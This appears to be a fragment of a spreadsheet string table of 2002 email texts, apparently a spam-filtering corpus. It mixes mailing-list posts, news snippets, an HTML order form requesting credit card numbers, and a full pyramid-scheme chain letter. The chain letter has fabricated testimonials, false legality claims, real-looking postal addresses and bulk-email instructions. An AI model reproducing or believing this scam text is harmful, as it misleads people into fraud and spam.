 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Street Address:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="street" size=25&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;City, State, Zip: &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="city" size=18&gt;&lt;font 
 color="#000000"&gt;, &lt;/font&gt;&lt;input type=text name="state" size=2 
 maxlength=2&gt;&lt;input type=text name="zip" size=10 maxlength=5&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Company: &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="company" size=25&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;th ALIGN=LEFT&gt;&lt;font color="#000000"&gt;E-Mail: &lt;/font&gt;&lt;/th&gt;
 &lt;td&gt;&lt;input type=text name="email" size=25&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Phone: &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="phone" size=12 maxlength=12&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Comments:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;textarea COLS=25 ROWS=4 name="comments"&gt;&lt;/textarea&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/blockquote&gt;
 &lt;center&gt;&lt;table BORDER COLS=2 WIDTH="75%" BGCOLOR="#FFCCCC" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Credit Card Type: &lt;font size=-1&gt;(vvvv wwww
 xxxx yyyy zzzz)&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;select name="CardType"&gt;&lt;option Value="Visa"&gt;&lt;font 
 color="#000000"&gt;Visa&lt;option 
 value="Mastercard"&gt;&lt;i&gt;Mastercard &lt;/i&gt;&lt;/font&gt;&lt;/select&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Card Number:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="CardNumber" size=20&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font color="#000000"&gt;Expiration Date:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td&gt;&lt;input type=text name="ExpirationDate" size=12&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;input type="submit" name="submit" value="Order Now! "&gt;&lt;input 
 type="reset" name="reset" value=" Clear "&gt;&lt;/form&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 3121wkca6-841pMNzl16
</t>
  </si>
  <si>
    <t xml:space="preserve">At 1:52 PM -0400 8/13/02, Theo Van Dinter wrote:
 &gt;On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:
 &gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments
 &gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,
 &gt;&gt;  correct?  Does anyone know of an easy way to do this?
 &gt;
 &gt;use "spamassassin -r".  It'll take a message, strip the SA bits, and
 &gt;report to razor, all in one shot. :)
 Ah...  You learn something new every day!  This would make things 
 quite a bit easier.  I assume it can handle a mailbox full of mail to 
 report rather than a single piece of spam from STDIN.  I'll check the 
 docs on that though.
 Thanks!
   Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR      Pittsburg State University
 Network &amp; Systems Manager       Kelce 157Q
 Office of Information Systems   Pittsburg, KS 66762
 Voice: (620) 235-4606           Fax: (620) 235-4545
 http://www.pittstate.edu/ois/
 Warning:  This message has been quadruple Rot13'ed for your protection.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</si>
  <si>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ThosStew@aol.com writes:
 &gt; In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:
 &gt; 
 &gt; &gt;If we're willing to count artificial
 &gt; &gt;selection as genetic engineering, 
 &gt; 
 &gt; Of course was genetic engineering. It used the fundamental mechanism of 
 &gt; genetics (inheritance of traits), and not randomly, but 
 &gt; intentionally--breeding for long fur, fat hams, whatever. The degree to which 
 &gt; the engineers--farmers, breeders--understood exactly how the mehcanism works 
 &gt; is only marginally relevant to the question of whether it was engineering. 
 Naw, I still disagree, again because if I'm going to be so loose
 with the definitions, then I'd have to say that I myself am a
 genetically engineered organism.  But I'm natural, baby.  My parents
 were attracted to each other's phenotypes, mixed some genes in the
 hopes that those genotypes would get in there, and grew me around
 them.  Sure, they engineered the process when they selected each
 other.  But they didn't engineer the genetics.  If genetic enginering
 wasn't such an important topic today, it wouldn't be such an important
 distinction.
 I guess that the reason that I disagree is that some groups arguing
 against any checks on genetic engineering use that same argument -
 "we've been doing it since prehistory, so we don't need to apply any
 caution today".
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Product Review: Darkling Simulations' Dark Tree 2
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613668,159/
 Date: 2002-10-06T18:12:52+01:00
 As audiences become more and more sophisticated about computer graphics, 
 fractal noise and procedural woodgrain textures can no longer guarantee gushing 
 reviews. Darkling Simulations Darktree 2 is the latest edition of the popular 
 tool for artists who want to develop complex, multilayered shaders ranging from 
 highly realistic natural surfaces to animated pyrotechnics to flatshaded 
 cartoon renderings.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Come on! It's fun and easy!!
</t>
  </si>
  <si>
    <t xml:space="preserve">*** PLEASE READ THIS EMAIL TO THE END ***
 =A0
 Try it. Just for fun. It will cost you 25$ to earn at least thousands of =
 dollars !!! This thing=20
 is legal because you are buying and selling something of value: marketing=
  reports.
 =A0
 There is MY true story.
 =A0
 I received by email the instructions include in this letter. It interests=
  me because the=20
 system was quite simple. In the list of people selling the reports (as yo=
 u will see above),=20
 there was a guy living not so far. I searched for his phone number and I =
 called him. I just=20
 wanted to know if this system was really working. He told me his business=
  was going=20
 very well and he was receiving from 50$ to 150$ in CASH everyday! That's =
 why I went=20
 into this thing!
 =A0
 =A0
 THANK'S TO THE COMPUTER AGE AND THE INTERNET!
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
 =A0
 Before you say ''Bull'', please read the following. This is the letter yo=
 u have been hearing=20
 about on the news lately. Due to the popularity of this letter on the Int=
 ernet, a national=20
 weekly news program recently devoted an entire show to the investigation =
 of this program=20
 described below, to see if it really can make people money. The show also=
  investigated=20
 whether or not the program was legal.
 =A0
 Their findings proved once and for all that there are ''absolutely NO Law=
 s prohibiting the=20
 participation in the program and if people can "follow the simple instruc=
 tion" they are=20
 bound to make some mega bucks with only $25 out of pocket cost''.
 =A0
 =3D=3D PRINT THIS NOW FOR YOUR FUTURE REFERENCE =3D=3D
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 =A0
 If you would like to make at least $500,000 every 4 to 5 months easily an=
 d comfortably,=20
 please read the following... THEN READ IT AGAIN and AGAIN!!!
 =A0
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 =A0
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND=20
 YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
 =A0
 INSTRUCTIONS:
 =A0
 =3D=3D=3D=3D=3DOrder all 5 reports shown on the list below =3D=3D=3D=3D=3D
 =A0
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT YOU ARE=20
 ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON=20
 THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR=20
 ENVELOPE TOP LEFT CORNER in case of any mail problems.
 =A0
 =3D=3D=3DWHEN YOU PLACE YOUR ORDER, MAKE SURE =3D=3D=3D
 =3D=3D=3DYOU ORDER EACH OF THE 5 REPORTS! =3D=3D=3D
 =A0
 You will need all 5 reports so that you can save them on your computer an=
 d resell them.=20
 =A0
 YOUR TOTAL COST $5 X 5 =3D $25.00.
 =A0
 Within a few days you will receive, via e-mail, each of the 5 reports fro=
 m these 5 different=20
 individuals. Save them on your computer so they will be accessible for yo=
 u to send to the=20
 1,000's of people who will order them from you. Also make a floppy of the=
 se reports and=20
 keep it on your desk in case something happens to your computer.
 =A0
 IMPORTANT - DO NOT alter the names of the people who are listed next to e=
 ach report,=20
 or their sequence on the list, in any way other than what is instructed b=
 elow in step '' 1=20
 through 6 '' or you will loose out on the majority of your profits. Once =
 you understand the=20
 way this works, you will also see how it does not work if you change it.=20
 =A0
 Remember, this method has been tested, and if you alter it, it will NOT w=
 ork!!! People=20
 have tried to put their friends/relatives names on all five thinking they=
  could get all the=20
 money. But it does not work this way. Believe us, some have tried to be g=
 reedy and then=20
 nothing happened. So Do Not try to change anything other than what is ins=
 tructed.=20
 Because if you do, it will not work for you. Remember, honesty reaps the =
 reward!!!=20
 =A0
 This IS a legitimate BUSINESS. You are offering a product for sale and ge=
 tting paid for it.=20
 Treat it as such and you will be VERY profitable in a short period of tim=
 e.
 =A0
 1.. After you have ordered all 5 reports, take this advertisement and REM=
 OVE the name=20
 &amp; address of the person in REPORT # 5. This person has made it through th=
 e cycle and=20
 is no doubt counting their fortune.
 =A0
 2..Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 =A0
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 =A0
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 =A0
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 =A0
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 =A0
 PLEASE MAKE SURE you copy every name &amp; address ACCURATELY! This is critic=
 al=20
 to YOUR success.
 =A0
 Take this entire letter, with the modified list of names, and save it on =
 your computer. DO=20
 NOT MAKE ANY OTHER CHANGES.
 =A0
 Save this on a disk as well just in case if you loose any data. To assist=
  you with=20
 marketing your business on the internet, the 5 reports you purchase will =
 provide you with=20
 invaluable marketing information which includes how to send bulk e-mails =
 legally, where=20
 to find thousands of free classified ads and much more. There are 2 prima=
 ry methods to=20
 get this venture going:
 =A0
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 =A0
 Let's say that you decide to start small, just to see how it goes, and we=
  will assume You=20
 and those involved send out only 5,000 e-mails each. Let's also assume th=
 at the mailing=20
 receive only a 0.2% (2/10 of 1%) response (the response could be much bet=
 ter but lets=20
 just say it is only 0.2%). Also many peoplewill send out hundreds of thou=
 sands e-mails=20
 instead of only 5,000 each).
 =A0
 Continuing with this example, you send out only 5,000 e-mails. With a 0.2=
 % response,=20
 that is only 10 orders for report # 1. Those 10 people responded by sendi=
 ng out 5,000 e-
 mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2% re=
 sponded with=20
 orders. That's=3D100 people responded and ordered Report # 2.
 =A0
 Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mai=
 ls. The 0.2%=20
 response to that is 1000 orders for Report # 3.
 =A0
 Those 1000 people send 5,000 e-mail each for a total of 5 million e-mail =
 sent out. The=20
 0.2% response is 10,000 orders for Report # 4.
 =A0
 Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000=
 (50 million) e-
 mails. The 0.2% response to that is 100,000 orders for Report # 5.=20
 =A0
 =A0
 THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.00 (half a million dolla=
 rs).
 =A0
 Your total income in this example is: 1..... $50 + 2..... $500 + 3.....$5=
 ,000 + 4.....=20
 $50,000 + 5.... $500,000 ....=20
 Grand Total =3D $555,550.00
 =A0
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT THE WORST=20
 POSSIBLE RESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU WILL=20
 STILL MAKE A LOT OF MONEY !
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 =A0
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF=20
 5,000 YOU MAILED TO. Dare to think for a moment what would happen if ever=
 yone or=20
 half or even one 4th of those people mailed 100,000 e-mails each or more?
 =A0
 There are over 150 million people on the Internet worldwide and counting,=
  with thousands=20
 more coming on line every day. Believe me, many people will do just that,=
  and more!
 =A0
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 =A0
 Advertising on the net is very, very inexpensive and there are hundreds o=
 f FREE places=20
 to advertise. Placing a lot of free ads on the Internet will easily get a=
  larger response. We=20
 strongly suggest you start with Method # 1 and add METHOD #2 as you go al=
 ong. For=20
 every $5 you receive, all you must do is e-mail them the Report they orde=
 red. That's it.=20
 Always provide same day service on all orders.
 =A0
 This will guarantee that the e-mail they send out, with your name and add=
 ress on it, will=20
 be prompt because they can not advertise until they receive the report.
 =A0
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D AVAILABLE REPORTS =3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D
 The reason for the "cash" is not because this is illegal or somehow "wron=
 g". It is simply=20
 about time. Time for checks or credit cards to be cleared or approved, et=
 c. Concealing it=20
 is simply so no one can SEE there is money in the envelope and steal it b=
 efore it gets to=20
 you.
 =A0
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always send $5=20
 cash (U.S. CURRENCY) for each Report. Checks NOT accepted. Make sure the =
 cash is=20
 concealed by wrapping it in at least 2 sheets of paper. On one of those s=
 heets of paper,=20
 Write the NUMBER &amp; the NAME of the Report you are ordering, YOUR E-MAIL=20
 ADDRESS and your name and postal address.
 =A0
 PLACE YOUR ORDER FOR THESE REPORTS NOW :
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DREPORT # 1: 'The Insider'=
 s=20
 Guide To Advertising for Free On The Net
 =A0
 Order Report #1 from:=20
 Y.L.Wong
 P.O. Box NO. 71819
 Kowloon Central Post Office
 Hong Kong
 __________________________________________________
 =A0
 REPORT # 2: The Insider's Guide To Sending Bulk Email On The Net
 =A0
 Order Report # 2 from:=20
 Martin Veronneau
 C.P. 70058
 Laval, Quebec
 H7R 5Z2
 Canada
 __________________________________________________
 =A0
 REPORT # 3: Secret To Multilevel Marketing On The Net
 =A0
 Order Report # 3 from:=20
 Francis Kidd
 P.O. Box 209
 Homestead, PA 15120
 USA
 =A0
 __________________________________________________
 =A0
 REPORT # 4: How To Become A Millionaire Using MLM &amp; The Net
 =A0
 Order Report # 4 from:=20
 M.L. Frayser
 P.O. Box 61432
 Fort Myers, FL 33906
 USA
 __________________________________________________
 =A0
 REPORT # 5: How To Send Out One Million Emails For Free
 =A0
 Order Report # 5 From:=20
 Stone Evans=20
 600 N. Pearl, Suite G103
 Dallas, TX 75201
 USA=20
 =A0=A0
 __________________________________________________
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 =A0
 Follow these guidelines to guarantee your success:
 =A0
 =3D=3D=3D If you do not receive at least 10 orders for Report #1 within 2=
  weeks, continue=20
 sending e-mails until you do.
 =A0
 =3D=3D=3D After you have received 10 orders, 2 to 3 weeks after that you =
 should receive 100=20
 orders or more for REPORT # 2. If you did not, continue advertising or se=
 nding e-mails=20
 until you do.
 =A0
 **Once you have received 100 or more orders for Report # 2, YOU CAN RELAX=
 , because=20
 the system is already working for you, and the cash will continue to roll=
  in ! THIS IS=20
 IMPORTANT TO REMEMBER: Every time your name is moved down on the list, yo=
 u are=20
 placed in front of a Different report.
 =A0
 You can KEEP TRACK of your PROGRESS by watching which report people are=20
 ordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER=20
 BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT=20
 to the income you can generate from this business!!!
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:=20
 You have just received information that can give you financial freedom fo=
 r the rest of your=20
 life, with NO RISK and JUST A LITTLE BIT OF EFFORT. You can make more mon=
 ey in=20
 the next few weeks and months than you have ever imagined. Follow the pro=
 gram=20
 EXACTLY AS INSTRUCTED. Do Not change it in any way. It works exceedingly =
 well as=20
 it is now.
 =A0
 Remember to e-mail a copy of this exciting report after you have put your=
  name and=20
 address in Report #1 and moved others to #2 .....# 5 as instructed above.=
  One of the=20
 people you send this to may send out 100,000 or more e-mails and your nam=
 e will be on=20
 every one of them.=20
 =A0
 Remember though, the more you send out the more potential customers you w=
 ill reach.=20
 So my friend, I have given you the ideas, information, materials and oppo=
 rtunity to=20
 become financially independent.
 =A0
 IT IS UP TO YOU NOW!
 =A0
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DTESTIMONIALS=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D
 ''My name is Mitchell. My wife, Jody and I live in Chicago. I am an accou=
 ntant with a=20
 major U.S. Corporation and I make pretty good money. When I received this=
  program I=20
 grumbled to Jody about receiving 'junk mail'. I made fun of the whole thi=
 ng, spouting my=20
 knowledge of the population and percentages involved. I ''knew'' it would=
 n't work. Jody=20
 totally ignored my supposed intelligence and few days later she jumped in=
  with both feet.=20
 I made merciless fun of her, and was ready to lay the old ''I told you so=
 '' on her when the=20
 thing didn't work.=20
 =A0
 Well, the laugh was on me! Within 3 weeks she had received 50 responses. =
 Within the=20
 next 45 days she had received total $ 147,200.00......... all cash! I was=
  shocked. I have=20
 joined Jodyin her ''hobby''.
 =A0
 Mitchell Wolf M.D., Chicago, Illinois
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 ''Not being the gambling type, it took me several weeks to make up my min=
 d to=20
 participate in this plan. But conservative as I am, I decided that the in=
 itial investment was=20
 so little that there was just no way that I wouldn't get enough orders to=
  at least get my=20
 money back. I was surprised when I found my medium size post office box c=
 rammed=20
 with orders. I made $319,210.00 in the first 12 weeks.=20
 =A0
 The nice thing about this deal is that it does not matter where people li=
 ve. There simply=20
 isn't a better investment with a faster return and so big''.=20
 =A0
 Dan Sondstrom, Alberta, Canada
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 ''I had received this program before. I deleted it, but later I wondered =
 if I should have given=20
 it a try. Of course, I had no idea who to contact to get another copy, so=
  I had to wait until=20
 I was e-mailed again by someone else.........11 months passed then it luc=
 kily came=20
 again...... I did not delete this one! I made more than $490,000 on my fi=
 rst try and all the=20
 money came within 22 weeks''.=20
 =A0
 Susan De Suza, New York, N.Y.
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 ''It really is a great opportunity to make relatively easy money with lit=
 tle cost to you. I=20
 followed the simple instructions carefully and within 10 days the money s=
 tarted to come=20
 in. My first month I made $20, in the 2nd month I made $560.00 and by the=
  end of third=20
 month my total cash count was $362,840.00. Life is beautiful, Thanx to in=
 ternet''.=20
 =A0
 Fred Dellaca, Westport, New Zealand
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 =A0
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO=20
 FINANCIAL FREEDOM !
 =A0
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 If you have any questions of the legality of this program, contact the Of=
 fice of Associate=20
 Director for Marketing Practices, Federal Trade Commission, Bureau of Con=
 sumer=20
 Protection, Washington, D.C.
 =A0
 =A0
 This message is sent in compliance of the proposed bill SECTION 301, para=
 graph=20
 (a)(2)(C) of S. 1618.=20
 =A0
 =A0
 * This message is not intended for residents in the State of Washington, =
 Virginia or=20
 California, screening of addresses has been done to the best of our techn=
 ical ability.
 =A0
 * This is a one-time mailing and this list will never be used again.
 =A0
 =A0
 * To be removed from this list, please send an email with the word REMOVE=
  in the=20
 subject line to freebie4u@sinatown.com
 =A0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</si>
  <si>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West Nile virus transmitted in breast milk
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553538,1440/
 Date: Not supplied
 Viral antibodies are identified in a one-month-old baby, as the US death toll 
 rises sharply
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Hot rock
</t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/scripts/editorial2.cgi?cid=news&amp;aid=481620
 Close encounter of burnt kind
 IT came from outer space  or did it? Teenager Siobhan Cowton is convinced
 the object which struck her as she climbed into the family car at her home
 in Northallerton is extra-terrestrial.
 But while her claims are being treated with a certain amount of studied
 academic scepticism by experts in these matters, the 14-year-old schoolgirl
 is adamant she was hit on the foot by a meteorite.
 Siobhan initially thought there was a more prosaic explanation  that the
 odd-looking stone had been thrown at her by a child,.
 But on closer inspection, she discovered all was not as it seemed  because
 it was hot when she picked it up. It hit her on a foot but caused no injury.
 "I looked at it again and it had a black and grey colour with a shiny bubble
 surface," she said.
 After closer inspection by her father Niel, and comparison with pictures on
 the Internet, Siobhan plans to ask scientists at Durham University to check
 the object for authenticity.
 If it is from outer space, Siobhan says she will consider putting it up for
 auction.
 She added: "If it isn't worth anything then I suppose I will keep it myself
 for sentimental value. It is not every day that you are hit by a meteorite."
 But Dr Ben Horton, a lecturer in physical geography, was the acme of
 academic caution.
 "Meteors have features that can be used to establish whether it is a piece
 of extraterrestrial rock," he said.
 "They have a very smooth surface but sometimes they have shallow depressions
 and cavities. If they are hot, they should have a black ash like crust burnt
 around the edge.
 "Most are between five and 60 centimetres but five centimetres is the
 smallest that they usually appear."
 To establish the provenance of Siobhan's suspected meteorite it would have
 to be subject to a mineral breakdown but Dr Horton thinks the chances of it
 being extra-terrestrial are slim.
 "Around 50,000 a year strike the Earth's surface and, considering the size
 of the Earth, it is very unlikely to be a meteorite.
 "However, there is a possibility and there is no reason it couldn't happen,"
 he added. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toward Mac OS XX
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000208.html
 Date: 2002-10-01T10:22:46-08:00
 David Pogue is talking about Mac in the past, present, and future. Mac market 
 is growing. It's a small part of a very large and growing pie. So Apple isn't 
 dead and won't die. But they'll never be the big...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 5 Aug 2002, Stephen D. Williams wrote:
 &gt; Obviously you need a server at 127.0.0.1 that serves well known cookies...
 Well known *one-time* cookies?
 &gt; The arms race continues.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Good point, Tom.
 We want to be led. It's much easier to blame our leaders, throw stones at 
 scapegoats, than to actually take responsibility for our actions and think 
 through the consequences.
 At 11:14 AM 7/26/2002 -0400, Tom wrote:
 &gt;On Fri, 26 Jul 2002, Tom wrote:
 &gt;
 &gt;--]On Thu, 25 Jul 2002, Adam L. Beberg wrote:
 &gt;--]
 &gt;--]--]Drains what? My wallet you mean? America _is_ greed, that's who and 
 &gt;what we
 &gt;--]--]are.
 &gt;--]
 &gt;--]You really are about as clueless as a fridge without tcp/ip.
 &gt;
 &gt;Before there is a jump off to some thread I cant be around to respond to
 &gt;(contractions now getting closer and longer and stronger but the kids head
 &gt;is still a bit off true) let me say this.
 &gt;
 &gt;(and this is the short rambling take on America as it stands today, so
 &gt;flesh it our for me if you want)
 &gt;
 &gt;The problem with america is not its goverment, its companies, its
 &gt;corportate raider mentality, its throw away buy a new one culture, its not
 &gt;that we are greedy or shallow or over religious or under religious or even
 &gt;religious in the context of a secular ruling system......
 &gt;
 &gt;The problem with america is its citizens, the things that make it up. We
 &gt;are not greedy, we are sheep. We are easily led from one trend to the
 &gt;next, we are diverted in our lives to follow any one of a number of media
 &gt;induced "goals" that run us through commericalistic hoops shedding not
 &gt;only our worth but our fine grain value as individuals.
 &gt;
 &gt;We are a nation of a million differnt parts seeking a homogony of sameness
 &gt;thru right thought, right action right purcheses right hopes right dreams
 &gt;right teampicking right listeningtothem right mouthingoftheessentialwords
 &gt;and right sameness
 &gt;
 &gt;We seek to loose the individuality of our past by plunging headlong into
 &gt;the lava searing melting pot to come out with all our quak spins set the
 &gt;same as anyone else.
 &gt;
 &gt;In so doing we subvert and subject ourselves tothe "status quo" in ways
 &gt;that makes Islam look  like an excersise in free will and hippy love
 &gt;magic.
 &gt;
 &gt;We have allowed a subset of our citizens to set the pace for us, mostly
 &gt;because to set the pace sets you apart and that is a bad thing in the
 &gt;melting pot society. Thats why the rulers, the trend setters, the rich and
 &gt;the famous are the THEM.
 &gt;
 &gt;We then follow that with THEY set us up to do, we run the various rat
 &gt;mazes that have been constructed and call this a live, We chase the
 &gt;cheese, which is green, moldy and made of paper. We climb the moutians set
 &gt;up as goals. We fight the OTHERS who we are told are evil. In the end we
 &gt;judge our living on how well we followed one of the mazes and how fat we
 &gt;are before the slaughter.
 &gt;
 &gt;We are the blue collar worker, the office worker, the disability con, the
 &gt;tech warrior, the homemaker, the godfearing do gooder, the celeb.
 &gt;
 &gt;or we are the OTHER, the dont fiters, the Trouble Makers.
 &gt;
 &gt;-tom
 &gt;
 &gt;
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?gb2312?q?_=B4=F2=D4=ECMBA?=
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --de3568c4-65bc-11d6-b6fa-0050ba415022
 Content-Type: text/plain; charset=gb2312
 Content-Transfer-Encoding: quoted-printable
                      =CB=C4=B4=F3=CB=D8=D6=CA=C5=E0=D1=F8=B4=F2=D4=ECMBA
     MBA=BD=CC=D3=FD=B5=C4=CC=D8=B5=E3=A3=AC=D4=DA=CB=D8=D6=CA=C5=E0=D1=F8=C9=
 =CF=D7=DC=CA=C7=D2=D4=D3=C5=D0=E3=B9=DC=C0=ED=C8=CB=B2=C5=B1=D8=B1=B8=B5=C4=CB=
 =D8=D6=CA=CE=AA=C5=E0=D1=F8=B5=BC=CF=F2=B5=C4=A3=AC    =B8=C5=C0=A8=C6=F0=C0=
 =B4=D6=F7=D2=AA=D3=D0=D2=D4=CF=C2=BC=B8=B8=F6=B7=BD=C3=E6=A3=BA    
     1. =B7=D6=CE=F6=C4=DC=C1=A6=A3=BA=D7=A2=D6=D8=B7=D6=CE=F6=C4=DC=C1=A6=B5=
